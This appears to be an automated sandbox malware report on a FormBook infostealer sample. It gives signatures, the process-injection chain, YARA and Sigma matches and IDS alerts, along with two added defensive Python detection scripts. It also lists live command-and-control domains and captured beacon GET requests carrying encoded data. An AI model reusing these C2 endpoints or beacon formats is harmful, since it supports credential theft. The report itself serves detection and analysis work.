
Windows Analysis Report
QLLafoDdqv.exe

Overview

General Information

Sample name: QLLafoDdqv.exe (renamed because the original name is a hash value)
Original sample name: 16a3ae414f6303383d089b24318edcedb5891f081108035ee2017c3a61ab0012.exe
Analysis ID: 1486705
MD5: 9f295f94dfaf4a72ef4aaa28e15543f5
SHA1: 5708ab5bfabaa81d29709fabdd08aa8ba5891d47
SHA256: 16a3ae414f6303383d089b24318edcedb5891f081108035ee2017c3a61ab0012
Tags: exe, Formbook

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • QLLafoDdqv.exe (PID: 1656 cmdline: "C:\Users\user\Desktop\QLLafoDdqv.exe" MD5: 9F295F94DFAF4A72EF4AAA28E15543F5)
    • svchost.exe (PID: 1804 cmdline: "C:\Users\user\Desktop\QLLafoDdqv.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • WOaBXdWwIJKzuV.exe (PID: 3620 cmdline: "C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 2664 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • WOaBXdWwIJKzuV.exe (PID: 5700 cmdline: "C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3536 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
No configs have been found
Yara matches in process memory dumps (Source | Rule | Description | Author), matched strings listed beneath each entry:
  00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
  00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
  00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x3e43f:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x27ade:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
  (11 further entries collapsed in the original report; not shown)
Yara matches in unpacked PE files (Source | Rule | Description | Author), matched strings listed beneath each entry:
  2.2.svchost.exe.24d0000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
  2.2.svchost.exe.24d0000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  2.2.svchost.exe.24d0000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
  2.2.svchost.exe.24d0000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
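The two hex strings reported for Windows_Trojan_Formbook_1112e116 ($a2 and $a3) are the same 20-byte sequences in every dump above; only the offsets move with the dump's base. The script below is an added example, not part of the Joe Sandbox report or of the rule's published source: it locates those two sequences in an arbitrary memory dump with plain Python (no yara-python needed) and renders them as a YARA rule text for the yara CLI. The hex strings are copied from the report; the rule name and the "any of them" condition are assumptions, because the report prints only the strings that matched, not the rule body. The sample dump is constructed filler with the strings placed at the offsets the report gives for the first dump (0x2a6e0 and 0x13d7f).

```python
"""Added example (not part of the report): locate the two reported
Windows_Trojan_Formbook_1112e116 byte patterns in a memory dump and
render them as a YARA rule. Rule name and condition are assumptions."""

# String definitions exactly as printed in the report ($a2 and $a3).
PATTERNS = {
    "$a2": bytes.fromhex("74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55"),
    "$a3": bytes.fromhex("1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01"),
}


def scan(data):
    """Map each string name to every offset at which it occurs in data."""
    hits = {}
    for name, needle in PATTERNS.items():
        offsets, start = [], 0
        while (idx := data.find(needle, start)) >= 0:
            offsets.append(idx)
            start = idx + 1          # keep going: a string may repeat in a dump
        hits[name] = offsets
    return hits


def matches(data, need_all=False):
    """Verdict in the style of a YARA condition: any (default) or all strings present."""
    present = [bool(offs) for offs in scan(data).values()]
    return all(present) if need_all else any(present)


def as_yara(name="Formbook_strings_subset"):
    """Render PATTERNS as YARA rule text; name and 'any of them' are assumptions."""
    lines = [f"rule {name} {{", "    strings:"]
    for sname, needle in PATTERNS.items():
        lines.append(f"        {sname} = {{ {needle.hex(' ').upper()} }}")
    lines += ["    condition:", "        any of them", "}"]
    return "\n".join(lines)


def build_sample_dump():
    """Constructed stand-in for the first dump above (base 0x2530000): NOP filler
    with $a2 written at 0x2a6e0 and $a3 at 0x13d7f, the offsets the report lists."""
    buf = bytearray(b"\x90" * 0x30000)
    buf[0x2A6E0:0x2A6E0 + len(PATTERNS["$a2"])] = PATTERNS["$a2"]
    buf[0x13D7F:0x13D7F + len(PATTERNS["$a3"])] = PATTERNS["$a3"]
    return bytes(buf)


if __name__ == "__main__":
    dump = build_sample_dump()
    for name, offsets in scan(dump).items():
        print(name, [hex(o) for o in offsets])
    print("verdict:", matches(dump))
    print(as_yara())
```

To run it against a real dump, read the file as bytes and pass it to scan(); the offsets returned are file offsets, and adding the dump's base address (the fourth dotted field of the dump name, here 0x2530000) gives the virtual address. Two 20-byte sequences are a narrow subset of the rule, so treat a hit as corroboration of the report's other FormBook indicators rather than as a verdict on its own.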

            System Summary

Source: Process started. The same event matched two Sigma rules, by Florian Roth (Nextron Systems) and by vburov. Event data:
  Command: "C:\Users\user\Desktop\QLLafoDdqv.exe"
  CommandLine: "C:\Users\user\Desktop\QLLafoDdqv.exe"
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\SysWOW64\svchost.exe
  NewProcessName: C:\Windows\SysWOW64\svchost.exe
  OriginalFileName: C:\Windows\SysWOW64\svchost.exe
  ParentCommandLine: "C:\Users\user\Desktop\QLLafoDdqv.exe"
  ParentImage: C:\Users\user\Desktop\QLLafoDdqv.exe
  ParentProcessId: 1656
  ParentProcessName: QLLafoDdqv.exe
  ProcessCommandLine: "C:\Users\user\Desktop\QLLafoDdqv.exe"
  ProcessId: 1804
  ProcessName: svchost.exe
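The Sigma match above is the process-hollowing pattern that the process tree also shows: svchost.exe (PID 1804) runs from its genuine image (its MD5 differs from the sample's), but its command line is the sample's own path and its parent is the sample rather than services.exe. The script below is an added example, not part of the report and not the Sigma rule's own logic: it evaluates constructed process-creation events that use the same field names as the event above, and flags svchost.exe with an unexpected parent as well as any process whose command line names a different executable than its image. The set of expected svchost.exe parents is an assumption; the first event copies the report's Sigma data, the second is constructed benign traffic.

```python
"""Added example (not part of the report): evaluate process-creation events for
the two signals visible in the Sigma data above. EXPECTED_SVCHOST_PARENTS is an
assumption about a default Windows 10 host, not something the report states."""
import ntpath

# Assumption: binaries that legitimately start svchost.exe on a stock Windows 10 host.
EXPECTED_SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "svchost.exe"}


def basename(path):
    """Lower-cased file name of a Windows path (ntpath works on any OS)."""
    return ntpath.basename(path).lower()


def commandline_image(cmdline):
    """Executable named by a command line, honouring a quoted first token."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        token = cmdline[1:end] if end > 0 else cmdline[1:]
    else:
        token = cmdline.split(" ", 1)[0]
    return basename(token)


def evaluate(event):
    """Return the reasons an event is suspicious; an empty list means clean."""
    reasons = []
    image = basename(event["Image"])
    parent = basename(event.get("ParentImage", ""))
    if image == "svchost.exe" and parent not in EXPECTED_SVCHOST_PARENTS:
        reasons.append(f"svchost.exe started by uncommon parent {parent or '<none>'}")
    cl_image = commandline_image(event.get("CommandLine", ""))
    if cl_image and cl_image != image:
        # A hollowed process keeps the victim's image but the injector's command line.
        reasons.append(f"command line names {cl_image} but image is {image}")
    return reasons


# Constructed events: the first mirrors the Sigma event data in this report,
# the second is a normal service-host launch used as a negative control.
EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\svchost.exe",
     "ParentImage": r"C:\Users\user\Desktop\QLLafoDdqv.exe",
     "CommandLine": r'"C:\Users\user\Desktop\QLLafoDdqv.exe"',
     "ProcessId": 1804, "ParentProcessId": 1656},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\system32\svchost.exe -k netsvcs -p",
     "ProcessId": 900, "ParentProcessId": 700},
]


def run(events=EVENTS):
    """Map ProcessId to its list of findings."""
    return {e["ProcessId"]: evaluate(e) for e in events}


if __name__ == "__main__":
    for pid, reasons in run().items():
        print(pid, reasons or "ok")
```

The command-line check is the more robust of the two: a parent-based rule has an allow list to maintain, whereas a process whose image and command-line executable disagree is abnormal regardless of who spawned it. Sysmon Event ID 1 and Windows Security event 4688 both carry the fields used here.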
            No Snort rule has matched
IDS alerts: 15 connections, every one matching SID 2050745, protocol TCP, destination port 80, classtype "Malware Command and Control Activity Detected". Listed chronologically:
  Timestamp                        Source port
  2024-08-02T13:50:17.693616+0200  49720
  2024-08-02T13:51:16.664024+0200  49726
  2024-08-02T13:51:30.591363+0200  49733
  2024-08-02T13:51:43.897495+0200  49738
  2024-08-02T13:51:57.423849+0200  49744
  2024-08-02T13:52:11.078419+0200  49748
  2024-08-02T13:52:25.093527+0200  49752
  2024-08-02T13:52:38.434979+0200  49758
  2024-08-02T13:52:51.871610+0200  49762
  2024-08-02T13:53:05.503000+0200  49766
  2024-08-02T13:53:27.259778+0200  49770
  2024-08-02T13:53:43.440829+0200  64512
  2024-08-02T13:54:04.925630+0200  64518
  2024-08-02T13:54:18.417842+0200  64522
  2024-08-02T13:54:27.403003+0200  64523



            AV Detection

Source: http://www.empowermedeco.com/fo8o/ | Avira URL Cloud: Label: malware
Source: http://www.shenzhoucui.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBTD8WClZdEhsa3dPrDeE1SdlnJbrG6MsWCo/sylvA1Bg/24QA05c= | Avira URL Cloud: Label: malware
Source: http://www.liangyuen528.com/fo8o/ | Avira URL Cloud: Label: malware
Source: http://www.liangyuen528.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8= | Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk= | Avira URL Cloud: Label: malware
Source: http://www.empowermedeco.com/fo8o/?blWd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&Ixe=Apq4tPPXNdTp2 | Avira URL Cloud: Label: malware
Source: http://www.kasegitai.tokyo/fo8o/ | Avira URL Cloud: Label: malware
Source: http://www.shenzhoucui.com/fo8o/ | Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/ | Avira URL Cloud: Label: malware
Source: https://www.empowermedeco.com/fo8o/?blWd=mxnR | Avira URL Cloud: Label: malware
Source: http://www.kasegitai.tokyo/fo8o/?blWd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&Ixe=Apq4tPPXNdTp2 | Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/ | Avira URL Cloud: Label: phishing
Source: www.donnavariedades.com | Virustotal: Detection: 8%
Source: empowermedeco.com | Virustotal: Detection: 11%
Source: www.liangyuen528.com | Virustotal: Detection: 6%
Source: www.kasegitai.tokyo | Virustotal: Detection: 7%
Source: www.rssnewscast.com | Virustotal: Detection: 6%
Source: www.goldenjade-travel.com | Virustotal: Detection: 8%
Source: www.shenzhoucui.com | Virustotal: Detection: 8%
Source: www.techchains.info | Virustotal: Detection: 10%
Source: www.magmadokum.com | Virustotal: Detection: 9%
Source: www.660danm.top | Virustotal: Detection: 10%
Source: www.antonio-vivaldi.mobi | Virustotal: Detection: 9%
Source: www.3xfootball.com | Virustotal: Detection: 9%
Source: www.empowermedeco.com | Virustotal: Detection: 5%
Source: elettrosistemista.zip | Virustotal: Detection: 10%
Source: www.k9vyp11no3.cfd | Virustotal: Detection: 8%
Source: www.b301.space | Virustotal: Detection: 6%
Source: www.elettrosistemista.zip | Virustotal: Detection: 7%
Source: http://www.magmadokum.com/fo8o/ | Virustotal: Detection: 10%
Source: http://www.empowermedeco.com/fo8o/ | Virustotal: Detection: 8%
Source: http://www.liangyuen528.com/fo8o/ | Virustotal: Detection: 6%
Source: http://www.rssnewscast.com/fo8o/ | Virustotal: Detection: 5%
Source: QLLafoDdqv.exe | ReversingLabs: Detection: 55%
Source: QLLafoDdqv.exe | Virustotal: Detection: 40%
Source: Yara match | File source: 2.2.svchost.exe.24d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.24d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2270118769.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2269837439.00000000024D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4574542638.0000000002F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4575593241.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2270555889.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: QLLafoDdqv.exe | Joe Sandbox ML: detected
Source: QLLafoDdqv.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WOaBXdWwIJKzuV.exe, 00000003.00000002.4564777627.0000000000D5E000.00000002.00000001.01000000.00000004.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4568620596.0000000000D5E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: QLLafoDdqv.exe, 00000000.00000003.2121082522.0000000004120000.00000004.00001000.00020000.00000000.sdmp, QLLafoDdqv.exe, 00000000.00000003.2125915509.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2270155402.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2270155402.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178687153.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2180433869.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2270123023.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4578682189.0000000003100000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2272280186.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4578682189.000000000329E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: QLLafoDdqv.exe, 00000000.00000003.2121082522.0000000004120000.00000004.00001000.00020000.00000000.sdmp, QLLafoDdqv.exe, 00000000.00000003.2125915509.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2270155402.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2270155402.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178687153.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2180433869.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.2270123023.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4578682189.0000000003100000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2272280186.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4578682189.000000000329E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2269979918.0000000002800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2238927543.000000000281A000.00000004.00000020.00020000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000003.00000002.4570954462.00000000014A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4567487590.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580387603.000000000372C000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.000000000318C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2556821079.0000000006F3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4567487590.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580387603.000000000372C000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.000000000318C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2556821079.0000000006F3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2269979918.0000000002800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2238927543.000000000281A000.00000004.00000020.00020000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000003.00000002.4570954462.00000000014A8000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0073DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0070C2A2 FindFirstFileExW
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_007468EE FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0074698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0073D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0073D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_00749642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0074979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_00749B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_00745C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0254BAB0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then xor eax, eax | 4_2_02539480
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then pop edi | 4_2_0253DD45
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then mov ebx, 00000004h | 4_2_02DA053E

            Networking

Source: DNS query: www.joyesi.xyz (2 queries)
Source: Joe Sandbox View | IP Address: 91.195.240.94
Source: unknown | TCP traffic detected without corresponding DNS query: 199.59.243.226 (23 connections)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (18 datagrams)
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0074CE44 InternetReadFile,SetEvent,GetLastError,SetEvent
Source: global traffic | HTTP traffic detected: 12 GET requests. All of them carry the same four headers:
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Request line and Host header of each request:
  Host: www.3xfootball.com
    GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8= HTTP/1.1
  Host: www.kasegitai.tokyo
    GET /fo8o/?blWd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
  Host: www.goldenjade-travel.com
    GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8= HTTP/1.1
  Host: www.antonio-vivaldi.mobi
    GET /fo8o/?blWd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Za05B0b8lb0SJyq2CvxKSeitE8AGVnlTlldZE82pgolkPyTnRDO8=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
  Host: www.magmadokum.com
    GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw= HTTP/1.1
  Host: www.rssnewscast.com
    GET /fo8o/?blWd=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
  Host: www.liangyuen528.com
    GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8= HTTP/1.1
  Host: www.techchains.info
    GET /fo8o/?blWd=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5haoQH1WjEWithRFLxLKOV4ce9fWCCnKIVX4jHNmrNLQZpWctVBLU=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
  Host: www.elettrosistemista.zip
    GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk= HTTP/1.1
  Host: www.donnavariedades.com
    GET /fo8o/?blWd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
  Host: www.empowermedeco.com
